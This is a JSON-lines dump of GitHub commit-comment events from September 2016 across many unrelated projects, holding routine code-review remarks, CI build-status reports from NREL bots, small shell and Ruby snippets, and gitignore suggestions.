{"id":"4590784810","type":"CommitCommentEvent","actor":{"login":"CMCDragonkai"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19099226,"position":null,"line":null,"path":null,"commit_id":"93c160fabc0e3b5fb3d997c840ef86a68f4bce00","created_at":"2016-09-20T16:21:41Z","updated_at":"2016-09-20T16:21:41Z","body":"Another side-effect of this patch is shutdown behaviour: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=825394#256"}},"created_at":"2016-09-20T16:21:41Z"}
{"id":"4590786184","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19099231,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-20T16:21:55Z","updated_at":"2016-09-20T16:21:55Z","body":"thanks, cherry-picked to retroplayer-17beta2"}},"created_at":"2016-09-20T16:21:55Z"}
{"id":"4590786861","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19099235,"position":null,"line":null,"path":null,"commit_id":"05843f9df9424319e9b28c525f0b0e6104460615","created_at":"2016-09-20T16:22:02Z","updated_at":"2016-09-20T16:22:02Z","body":"thanks, cherry-picked to retroplayer-17beta2"}},"created_at":"2016-09-20T16:22:02Z"}
{"id":"4590787618","type":"CommitCommentEvent","actor":{"login":"rohanpurohit"},"repo":{"name":"Ferrari-Dev-Team/android_kernel_xiaomi_ferrari"},"payload":{"comment":{"id":19099239,"position":null,"line":null,"path":null,"commit_id":"f5b7d47c2824e918b85a3bbb29a46bb340bcb607","created_at":"2016-09-20T16:22:10Z","updated_at":"2016-09-20T16:22:10Z","body":"well, what fire did is completely replace camera_v2 folder of caf branch with stock miui kernel, so tried applying stock changes on top of caf branch !  but i realised what fire did after this commit ! so this wont work anyway .. this is in attempt to fix flashlight"}},"created_at":"2016-09-20T16:22:10Z"}
{"id":"4590789024","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"alew46/bloccit"},"payload":{"comment":{"id":19099243,"position":5,"line":4,"path":"app/controllers/posts_controller.rb","commit_id":"cbb5f04e44b3bc0fdd68fd52b24bd9cc65b88bcf","created_at":"2016-09-20T16:22:24Z","updated_at":"2016-09-20T16:22:24Z","body":"so you really mean only: [:destroy]?"}},"created_at":"2016-09-20T16:22:24Z"}
{"id":"4590790464","type":"CommitCommentEvent","actor":{"login":"markebjones"},"repo":{"name":"Piwigo/Piwigo"},"payload":{"comment":{"id":19099252,"position":null,"line":null,"path":null,"commit_id":"b87094ac2f502b31b8650c371c01b74b894df50e","created_at":"2016-09-20T16:22:39Z","updated_at":"2016-09-20T16:22:39Z","body":"This fixes this problem: http://piwigo.org/forum/viewtopic.php?id=26704\r\n\r\nThanks! 👍 "}},"created_at":"2016-09-20T16:22:39Z"}
{"id":"4590792799","type":"CommitCommentEvent","actor":{"login":"cbeck"},"repo":{"name":"alew46/bloccit"},"payload":{"comment":{"id":19099259,"position":6,"line":5,"path":"app/controllers/topics_controller.rb","commit_id":"cbb5f04e44b3bc0fdd68fd52b24bd9cc65b88bcf","created_at":"2016-09-20T16:23:03Z","updated_at":"2016-09-20T16:23:03Z","body":"so only: [:edit, :update]?"}},"created_at":"2016-09-20T16:23:03Z"}
{"id":"4590801370","type":"CommitCommentEvent","actor":{"login":"webhaikal"},"repo":{"name":"Ferrari-Dev-Team/android_kernel_xiaomi_ferrari"},"payload":{"comment":{"id":19099281,"position":null,"line":null,"path":null,"commit_id":"f5b7d47c2824e918b85a3bbb29a46bb340bcb607","created_at":"2016-09-20T16:24:28Z","updated_at":"2016-09-20T16:24:28Z","body":"What about the soc commit?"}},"created_at":"2016-09-20T16:24:28Z"}
{"id":"4590801824","type":"CommitCommentEvent","actor":{"login":"X-Ryl669"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19099284,"position":null,"line":null,"path":null,"commit_id":"0dc18c913191e6037ba3ededcd39074a95d04284","created_at":"2016-09-20T16:24:32Z","updated_at":"2016-09-20T16:24:32Z","body":"Even with a pull down resistor, I got the line that \"jigger\" and the STM32 booted multiple time (it boots damn fast in fact). I wondered if a capacitor would be enough to filter this out, but did not make any try."}},"created_at":"2016-09-20T16:24:32Z"}
{"id":"4590806068","type":"CommitCommentEvent","actor":{"login":"pedroamarques"},"repo":{"name":"pedroamarques/EDL"},"payload":{"comment":{"id":19099302,"position":null,"line":null,"path":null,"commit_id":"04331f8751a018e2cd317c48a9f8efe529ee46dc","created_at":"2016-09-20T16:25:15Z","updated_at":"2016-09-20T16:25:15Z","body":"3.25 pra cada, nós 2 fizemos metade do trabalho cada um."}},"created_at":"2016-09-20T16:25:15Z"}
{"id":"4590806575","type":"CommitCommentEvent","actor":{"login":"alew46"},"repo":{"name":"alew46/bloccit"},"payload":{"comment":{"id":19099304,"position":5,"line":4,"path":"app/controllers/posts_controller.rb","commit_id":"cbb5f04e44b3bc0fdd68fd52b24bd9cc65b88bcf","created_at":"2016-09-20T16:25:20Z","updated_at":"2016-09-20T16:25:20Z","body":"Ah, yep, forgot about :only. That would have been way better."}},"created_at":"2016-09-20T16:25:20Z"}
{"id":"4590822135","type":"CommitCommentEvent","actor":{"login":"timj"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19099363,"position":6,"line":124,"path":"python/lsst/pipe/tasks/mocks/mockCoadd.py","commit_id":"cc60aeaf961f1859f7e83a98a2299dea6d464a15","created_at":"2016-09-20T16:27:53Z","updated_at":"2016-09-20T16:27:53Z","body":"If this works, I think I understand what the problem is. Does `afw.table` use a dict with keys of `int` and `long`? If it does then you need to make sure that `int` does not override the `long` entry (`long` is just an alias for `int`):\r\n```\r\n>>> from past.builtins import long\r\n>>> long == int\r\nTrue\r\n>>> long is int\r\nTrue\r\n```\r\nIt may be that `int` is winning and so you never get a 64bit type."}},"created_at":"2016-09-20T16:27:53Z"}
{"id":"4590824717","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19099372,"position":null,"line":null,"path":null,"commit_id":"a19ddcc005bd09857724e451c8c241b5e1660b8e","created_at":"2016-09-20T16:28:20Z","updated_at":"2016-09-20T16:28:20Z","body":"ASIHP-validation1 (mjwitte) - x86_64-MacOS-10.9-clang: OK (2324 of 2332 tests passed, 3 test warnings)\n\n * 11 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 8 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a19ddcc005bd09857724e451c8c241b5e1660b8e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T16:28:20Z"}
{"id":"4590825219","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"150balbes/lib"},"payload":{"comment":{"id":19099373,"position":null,"line":null,"path":null,"commit_id":"c9c653a4d742fcbfdbcf5f7a4a59360bc97d3297","created_at":"2016-09-20T16:28:25Z","updated_at":"2016-09-20T16:28:25Z","body":"This method works everywhere and can be used for this purpose:\r\n```\r\nroot_device=$(mountpoint -d /)\r\nfor file in /dev/* ; do\r\n                current_device=$(printf \"%d:%d\" $(stat --printf=\"0x%t 0x%T\" $file))\r\n                if [ $current_device = $root_device ]; then\r\n                        root_partition=$file\r\n                        break;\r\n                fi\r\n        done\r\necho $root_partition\r\n\r\n```\r\nI'll get back later on this if it remain in this state."}},"created_at":"2016-09-20T16:28:25Z"}
{"id":"4590829241","type":"CommitCommentEvent","actor":{"login":"DevoidCoding"},"repo":{"name":"DevoidCoding/TSMProfileManager"},"payload":{"comment":{"id":19099383,"position":26,"line":0,"path":"TSMProfileManager.Parser/Parser.cs","commit_id":"5f9a169c61fd287f167e0e39c5c670c7aa58149c","created_at":"2016-09-20T16:29:08Z","updated_at":"2016-09-20T16:29:08Z","body":"Refactor the method to have one for table and one for field ?"}},"created_at":"2016-09-20T16:29:08Z"}
{"id":"4590829565","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19099384,"position":null,"line":null,"path":null,"commit_id":"c445cfdeb7c4d5e143ab0da58f34ef3f8c299cdc","created_at":"2016-09-20T16:29:11Z","updated_at":"2016-09-20T16:29:11Z","body":"@abisz @doomsayer2 Please manually run `bower install --save react`"}},"created_at":"2016-09-20T16:29:11Z"}
{"id":"4590833264","type":"CommitCommentEvent","actor":{"login":"X-Ryl669"},"repo":{"name":"X-Ryl669/wifi_display"},"payload":{"comment":{"id":19099393,"position":null,"line":null,"path":null,"commit_id":"81b738f4ec9bc7abaeec10e25fb82b4721d19087","created_at":"2016-09-20T16:29:48Z","updated_at":"2016-09-20T16:29:48Z","body":"> although it partially fails at render\r\n\r\nIt does fail because some bytes are missing/wrong. It looks like it works, but it does not work \"well\". I've some commented code in the ESP main that send a sequence with random bytes and compute the checksum (the matching code in STM32 does the same). I got good checksum match only with UART. SPI always fails at some point randomly, and since there is no \"feedback\" from the STM32 to the ESP, well, we're struck."}},"created_at":"2016-09-20T16:29:48Z"}
{"id":"4590837584","type":"CommitCommentEvent","actor":{"login":"EujenioPr"},"repo":{"name":"EujenioPr/LCDUT_project"},"payload":{"comment":{"id":19099404,"position":null,"line":null,"path":null,"commit_id":"ddf3070829adf5c50be0a4babc97c825c431ab38","created_at":"2016-09-20T16:30:31Z","updated_at":"2016-09-20T16:30:31Z","body":"Fork"}},"created_at":"2016-09-20T16:30:31Z"}
{"id":"4590837905","type":"CommitCommentEvent","actor":{"login":"samanehAb"},"repo":{"name":"samanehAb/Hello_world"},"payload":{"comment":{"id":19099408,"position":null,"line":null,"path":null,"commit_id":"12d644f9dd32ab52a1eee44e679b64fa4413c388","created_at":"2016-09-20T16:30:35Z","updated_at":"2016-09-20T16:30:35Z","body":"this is a good commit!"}},"created_at":"2016-09-20T16:30:35Z"}
{"id":"4590840358","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19099415,"position":null,"line":null,"path":null,"commit_id":"ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004","created_at":"2016-09-20T16:30:59Z","updated_at":"2016-09-20T16:30:59Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2339 of 2340 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ec5abb3ced73d0a1ee5d2d0d9ea67b092e3cf004-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T16:30:59Z"}
{"id":"4590841054","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"DarkMorford/scd-bios-disassembly"},"payload":{"comment":{"id":19099418,"position":null,"line":null,"path":null,"commit_id":"4a30f46a559c2c536ab5ac4588465881c5831e4c","created_at":"2016-09-20T16:31:06Z","updated_at":"2016-09-20T16:31:06Z","body":"FYI, that Z80 sound driver is 'SMPS Z80 Type 1 FM'.\r\n\r\nThere's a whole pack of disassembled and documented SMPS drivers here:\r\nhttp://forums.sonicretro.org/index.php?showtopic=32473\r\n\r\nThe disassembly for this sound driver in particular is lacking in comments, but it's got a lot more labels.\r\n\r\nI maintain [a modified SMPS 68k Type 1a driver](https://github.com/Clownacy/Sonic-2-Clone-Driver-v2), so I know my way around one of these, if you need any help."}},"created_at":"2016-09-20T16:31:06Z"}
{"id":"4590846616","type":"CommitCommentEvent","actor":{"login":"frikadelki"},"repo":{"name":"dmoroz0v/telegram-bot-api"},"payload":{"comment":{"id":19099428,"position":12,"line":12,"path":"src/main/java/org/frikadelki/ash/telegram/api/chat/keyboard/TgmReplyKeyboardMarkupBuilder.java","commit_id":"5961eaef12dd4527885cd3ec71a04990eeef628a","created_at":"2016-09-20T16:32:03Z","updated_at":"2016-09-20T16:32:03Z","body":"В интерфесах нет смысла указывать нон-нулл и фанал, т.к. они работают только в реализациях. Надо бы везде поправить."}},"created_at":"2016-09-20T16:32:03Z"}
{"id":"4590847186","type":"CommitCommentEvent","actor":{"login":"BerniWittmann"},"repo":{"name":"BerniWittmann/spielplanismaning"},"payload":{"comment":{"id":19099429,"position":null,"line":null,"path":null,"commit_id":"78b7ce19ac6ae71c6fcbc790c6657002f5604652","created_at":"2016-09-20T16:32:08Z","updated_at":"2016-09-20T16:32:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;yz6DKjcF&#x2F;132-0-5-leerer-spielplan-fehlermeldung\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (0.5) Leerer Spielplan Fehlermeldung</a>"}},"created_at":"2016-09-20T16:32:08Z"}
{"id":"4590847537","type":"CommitCommentEvent","actor":{"login":"AdamSupinski"},"repo":{"name":"AdamSupinski/WDTProject"},"payload":{"comment":{"id":19099430,"position":30,"line":290,"path":"src/main/java/asupinski/MainApp.java","commit_id":"be18499afa4428e990d87766d955788c55a5d0d1","created_at":"2016-09-20T16:32:11Z","updated_at":"2016-09-20T16:32:11Z","body":"Ok, jednak null nie jest dobrym wyborem encodingu. Zamiast \"(String)null)\" przekażmy \"UTF-8\""}},"created_at":"2016-09-20T16:32:11Z"}
{"id":"4590851679","type":"CommitCommentEvent","actor":{"login":"FacticiusVir"},"repo":{"name":"FacticiusVir/SharpVk"},"payload":{"comment":{"id":19099437,"position":null,"line":null,"path":null,"commit_id":"54d5c3b100e3f707e374ebe88500debb005b4995","created_at":"2016-09-20T16:32:53Z","updated_at":"2016-09-20T16:32:53Z","body":"#21"}},"created_at":"2016-09-20T16:32:53Z"}
{"id":"4590853578","type":"CommitCommentEvent","actor":{"login":"fred3m"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19099445,"position":6,"line":124,"path":"python/lsst/pipe/tasks/mocks/mockCoadd.py","commit_id":"cc60aeaf961f1859f7e83a98a2299dea6d464a15","created_at":"2016-09-20T16:33:12Z","updated_at":"2016-09-20T16:33:12Z","body":"That's exactly what's happening. See [RFC-227](https://jira.lsstcorp.org/browse/RFC-227)"}},"created_at":"2016-09-20T16:33:12Z"}
{"id":"4590853979","type":"CommitCommentEvent","actor":{"login":"pintu-lipat"},"repo":{"name":"pirekiasia/pirekiasia.github.io"},"payload":{"comment":{"id":19099447,"position":null,"line":null,"path":null,"commit_id":"9e06d02cdce1d68c134044c2c80e7816c0b04ca2","created_at":"2016-09-20T16:33:17Z","updated_at":"2016-09-20T16:33:17Z","body":"###fghgfhfgh\r\n\r\n- \r\n\r\n1. \r\n\r\n> [``](_**# url**_)"}},"created_at":"2016-09-20T16:33:17Z"}
{"id":"4590856414","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"cooler-SAI/JadeCore548-patched"},"payload":{"comment":{"id":19099456,"position":null,"line":null,"path":null,"commit_id":"efe0b244e4d65889ee08909d1a49847bf5bb8f9e","created_at":"2016-09-20T16:33:41Z","updated_at":"2016-09-20T16:33:41Z","body":"The insert one was correct too, because those 3 did not exist in database."}},"created_at":"2016-09-20T16:33:41Z"}
{"id":"4590858852","type":"CommitCommentEvent","actor":{"login":"frikadelki"},"repo":{"name":"dmoroz0v/telegram-bot-api"},"payload":{"comment":{"id":19099467,"position":16,"line":16,"path":"src/main/java/org/frikadelki/ash/telegram/api/chat/keyboard/TgmReplyKeyboardMarkupBuilder.java","commit_id":"5961eaef12dd4527885cd3ec71a04990eeef628a","created_at":"2016-09-20T16:34:08Z","updated_at":"2016-09-20T16:34:08Z","body":"oneTime, т.к. не покидаем контекста"}},"created_at":"2016-09-20T16:34:08Z"}
{"id":"4590860347","type":"CommitCommentEvent","actor":{"login":"frikadelki"},"repo":{"name":"dmoroz0v/telegram-bot-api"},"payload":{"comment":{"id":19099478,"position":14,"line":14,"path":"src/main/java/org/frikadelki/ash/telegram/api/chat/keyboard/TgmReplyKeyboardMarkupBuilder.java","commit_id":"5961eaef12dd4527885cd3ec71a04990eeef628a","created_at":"2016-09-20T16:34:23Z","updated_at":"2016-09-20T16:34:23Z","body":"resize, т.к. не покидаем контекста"}},"created_at":"2016-09-20T16:34:23Z"}
{"id":"4590862071","type":"CommitCommentEvent","actor":{"login":"mdguo"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":19099485,"position":null,"line":null,"path":null,"commit_id":"686abd7137f9ca3dcf2b6ca2ab57fe5b3f1d0112","created_at":"2016-09-20T16:34:41Z","updated_at":"2016-09-20T16:34:41Z","body":"Instead of editing and committing files one at a time, you should really think about using a git client. I'd recommend Git Bash if you're on windows."}},"created_at":"2016-09-20T16:34:41Z"}
{"id":"4590864173","type":"CommitCommentEvent","actor":{"login":"attalias"},"repo":{"name":"attalias/oc-bsr"},"payload":{"comment":{"id":19099489,"position":1,"line":1,"path":"README.md","commit_id":"dc30f034bfb24602657d1eb141292b4c3f8974d1","created_at":"2016-09-20T16:35:04Z","updated_at":"2016-09-20T16:35:04Z","body":"sdsd"}},"created_at":"2016-09-20T16:35:04Z"}
{"id":"4590865893","type":"CommitCommentEvent","actor":{"login":"mikedodge04"},"repo":{"name":"erikng/cookbooks"},"payload":{"comment":{"id":19099495,"position":6,"line":74,"path":"macOS/cpe_applicationaccess/resources/cpe_applicationaccess.rb","commit_id":"e4b225ef486532a914ce3fdf560a22141971e66c","created_at":"2016-09-20T16:35:21Z","updated_at":"2016-09-20T16:35:21Z","body":"```\r\naction :run do\r\n  aa_prefs = node['cpe_applicationaccess'].reject { |_k, v| v.nil? }\r\n  aan_prefs = node['cpe_applicationaccess.new'].reject { |_k, v| v.nil? }\r\n  return if aa_prefs.empty? && aan_prefs.empty?\r\n  organization = node['organization'] ? node['organization'] : 'facebook' #docs says fb\r\n  prefix = node['cpe_profiles']['prefix']\r\n  aa_profile = {\r\n    'PayloadIdentifier' => \"#{prefix}.applicationaccess\",\r\n    'PayloadRemovalDisallowed' => true,\r\n    'PayloadScope' => 'System',\r\n    'PayloadType' => 'Configuration',\r\n    'PayloadUUID' => 'D1B78DD9-13A1-4BC5-9F22-EF10042F6041',\r\n    'PayloadOrganization' => organization,\r\n    'PayloadVersion' => 1,\r\n    'PayloadDisplayName' => 'Application Restrictions',\r\n    'PayloadContent' => []\r\n  }\r\n  unless aa_prefs.empty?\r\n     x = {\r\n      'PayloadType' => 'com.apple.applicationaccess',\r\n      'PayloadVersion' => 1,\r\n      'PayloadIdentifier' => \"#{prefix}.applicationaccess\",\r\n      'PayloadUUID' => '6493D033-179A-4E8D-AD85-FDBD09A28DCC',\r\n      'PayloadEnabled' => true,\r\n      'PayloadDisplayName' => 'Application Restrictions',\r\n    }\r\n    aa_prefs.each do |k,v| \r\n      x[k] = v\r\n    end\r\n    aa_profile['PayloadContent'] << x\r\n  end\r\n  unless aan_prefs.empty?\r\n     y = {\r\n      'PayloadType' => 'com.apple.applicationaccess.new',\r\n      'PayloadVersion' => 1,\r\n      'PayloadIdentifier' => \"#{prefix}.applicationaccess.new\",\r\n      'PayloadUUID' => '23E11571-624B-4B74-89C0-12226EEEACD1',\r\n      'PayloadEnabled' => true,\r\n      'PayloadDisplayName' => 'Application Restrictions New',\r\n      'familyControlsEnabled' => true,\r\n    }\r\n    aan_prefs.each do |k,v| \r\n      y[k] = v\r\n    end\r\n    aa_profile['PayloadContent'] << y\r\n  end\r\n  node.default['cpe_profiles'][\"#{prefix}.applicationaccess\"] = aa_profile\r\nend\r\n```"}},"created_at":"2016-09-20T16:35:21Z"}
{"id":"4590867660","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19099501,"position":9,"line":9,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-20T16:35:39Z","updated_at":"2016-09-20T16:35:39Z","body":"Should probably add `.springBeans` and `.factorypath`"}},"created_at":"2016-09-20T16:35:39Z"}
{"id":"4590869059","type":"CommitCommentEvent","actor":{"login":"jeremyBass"},"repo":{"name":"washingtonstateuniversity/fin-ad-base-theme"},"payload":{"comment":{"id":19099505,"position":8,"line":56,"path":"inc/builder.php","commit_id":"81e15b305224a31a2a7a75f2348227adc51bdcc8","created_at":"2016-09-20T16:35:53Z","updated_at":"2016-09-20T16:35:53Z","body":"😯 not sure what happened there.  Always fun with the to have neutral logic that almost seems like it logical.  Good catch there thank you "}},"created_at":"2016-09-20T16:35:53Z"}
{"id":"4590869286","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099507,"position":44,"line":44,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/datapackage.json","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:35:56Z","updated_at":"2016-09-20T16:35:56Z","body":"Not a valid SPDX identifier."}},"created_at":"2016-09-20T16:35:56Z"}
{"id":"4590872148","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099517,"position":30,"line":30,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/LICENSE","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:36:27Z","updated_at":"2016-09-20T16:36:27Z","body":"We no longer use MIT. This should be Apache-2.0. See other datasets."}},"created_at":"2016-09-20T16:36:27Z"}
{"id":"4590872892","type":"CommitCommentEvent","actor":{"login":"dsyer"},"repo":{"name":"spring-io/initializr"},"payload":{"comment":{"id":19099518,"position":5,"line":5,"path":"initializr-generator/src/main/resources/templates/gitignore.tmpl","commit_id":"d61bf18fa2b7703783ae5315f431afaf5c1d2876","created_at":"2016-09-20T16:36:35Z","updated_at":"2016-09-20T16:36:35Z","body":"I would add \r\n\r\n```\r\n*~\r\n#*\r\n*#\r\n.#*\r\nhs_err_pid*\r\n.DS_Store\r\n```"}},"created_at":"2016-09-20T16:36:35Z"}
{"id":"4590874458","type":"CommitCommentEvent","actor":{"login":"jeremyfelt"},"repo":{"name":"washingtonstateuniversity/fin-ad-base-theme"},"payload":{"comment":{"id":19099524,"position":8,"line":56,"path":"inc/builder.php","commit_id":"81e15b305224a31a2a7a75f2348227adc51bdcc8","created_at":"2016-09-20T16:36:52Z","updated_at":"2016-09-20T16:36:52Z","body":"👍 "}},"created_at":"2016-09-20T16:36:52Z"}
{"id":"4590876828","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19099530,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T16:37:14Z","updated_at":"2016-09-20T16:37:14Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1766 of 1766 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-20T16:37:14Z"}
{"id":"4590876866","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19099531,"position":10,"line":10,"path":"lib/node_modules/@stdlib/datasets/savoy-stopwords-fr/lib/index.js","commit_id":"f083d9e648dfd89fe54c9a70e842695f45a887f3","created_at":"2016-09-20T16:37:15Z","updated_at":"2016-09-20T16:37:15Z","body":"Single quotes, not double."}},"created_at":"2016-09-20T16:37:15Z"}
{"id":"4590878891","type":"CommitCommentEvent","actor":{"login":"rohanpurohit"},"repo":{"name":"Ferrari-Dev-Team/android_kernel_xiaomi_ferrari"},"payload":{"comment":{"id":19099538,"position":null,"line":null,"path":null,"commit_id":"f5b7d47c2824e918b85a3bbb29a46bb340bcb607","created_at":"2016-09-20T16:37:32Z","updated_at":"2016-09-20T16:37:32Z","body":"same ! applying our changes on top of caf"}},"created_at":"2016-09-20T16:37:32Z"}
{"id":"4590882335","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19099546,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T16:38:06Z","updated_at":"2016-09-20T16:38:06Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T16:38:06Z"}
{"id":"4590883047","type":"CommitCommentEvent","actor":{"login":"150balbes"},"repo":{"name":"150balbes/lib"},"payload":{"comment":{"id":19099549,"position":null,"line":null,"path":null,"commit_id":"c9c653a4d742fcbfdbcf5f7a4a59360bc97d3297","created_at":"2016-09-20T16:38:13Z","updated_at":"2016-09-20T16:38:13Z","body":"Thank you. Soon I'll try to check this variant to me models."}},"created_at":"2016-09-20T16:38:13Z"}
{"id":"4590883402","type":"CommitCommentEvent","actor":{"login":"samhamm"},"repo":{"name":"samhamm/about_me"},"payload":{"comment":{"id":19099551,"position":null,"line":null,"path":null,"commit_id":"bd6e620fd29c98a8d5f4aac55fd326671d1f091f","created_at":"2016-09-20T16:38:17Z","updated_at":"2016-09-20T16:38:17Z","body":"Hey y'all I committed this asweshum codez!"}},"created_at":"2016-09-20T16:38:17Z"}
{"id":"4590884458","type":"CommitCommentEvent","actor":{"login":"Copenbacon"},"repo":{"name":"Copenbacon/about_me"},"payload":{"comment":{"id":19099555,"position":null,"line":null,"path":null,"commit_id":"d017a84d48648a783d7ccba3fe26b92ae1a2187b","created_at":"2016-09-20T16:38:28Z","updated_at":"2016-09-20T16:38:28Z","body":"I committed this code today at 930"}},"created_at":"2016-09-20T16:38:28Z"}
{"id":"4590884476","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19099556,"position":null,"line":null,"path":null,"commit_id":"267558b8d6694e56c6cb103056e24fdb53064fb0","created_at":"2016-09-20T16:38:28Z","updated_at":"2016-09-20T16:38:28Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2362 of 2372 tests passed, 0 test warnings)\n\n * 10 tests had: AUD diffs.\n * 10 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-267558b8d6694e56c6cb103056e24fdb53064fb0-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.58%25-yellow.svg)</a> \n"}},"created_at":"2016-09-20T16:38:28Z"}
{"id":"4590884547","type":"CommitCommentEvent","actor":{"login":"Casey0Kane"},"repo":{"name":"Casey0Kane/about_me"},"payload":{"comment":{"id":19099557,"position":null,"line":null,"path":null,"commit_id":"a75e80e7c6fc984bbe88c5e5c453804da7a62dab","created_at":"2016-09-20T16:38:29Z","updated_at":"2016-09-20T16:38:29Z","body":"Look at this commit, we're gonna do great."}},"created_at":"2016-09-20T16:38:29Z"}
